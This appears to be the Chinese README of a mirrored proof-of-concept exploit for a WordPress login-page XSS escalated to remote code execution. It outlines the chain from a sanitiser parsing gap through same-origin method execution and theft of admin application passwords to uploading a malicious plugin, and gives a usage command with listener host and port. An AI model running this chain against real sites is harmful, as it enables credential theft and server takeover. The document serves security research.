HackSpeak 分发镜像。本仓库为 WordSec 发布的 XSS2Shell 教育用途 PoC(CVE-2026-64638)的分发镜像,代码与上游一致;上游为 MIT License,Copyright (c) 2026 WordSec。
⚠️ 仅供安全研究与授权测试使用,仅可对本人拥有或有书面授权评估的 WordPress 站点运行;PoC 会生成并清理临时发布物,请勿针对第三方管理员或生产系统。
XSS2Shell(CVE-2026-64638) 是 WordPress 登录页(wp-login.php)上的预认证反射型 XSS,可经完整链路升级为服务器端 PHP 代码执行(RCE)。
strip_tags() 与 WordPress KSES(wp_kses_post())的解析分歧——在 < 与标签名之间插入空格(如 < area),前者视为普通文本保留,后者解析为合法 HTML 元素(<area>/<div>/<button> 均在允许列表);ajaxurl → 登录页自带 user-profile.js 自动触发 jQuery POST → REST API JSONP(_jsonp)→ Same Origin Method Execution(SOME,Paulos Yibelo 2022)→ 跨窗口点击管理员 Application Password 授权按钮 → 窃取 API 凭据 → 发布含 <script> 的页面 → 上传恶意插件 ZIP → PHP 直接执行(无需激活);python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
| 参数 | 说明 |
|---|---|
-t, --target | WordPress 基地址(含 http/https,自动归一化尾斜杠) |
依赖:Python 3.7+,零第三方包;需管理员登录目标站并打开攻击者 URL(一次交互)。
-c, --command | shell 就绪后要执行的命令 |
--lhost / --lport | 监听地址/端口(lport 0 = 随机) |
--keep | 保留临时发布页(默认清理) |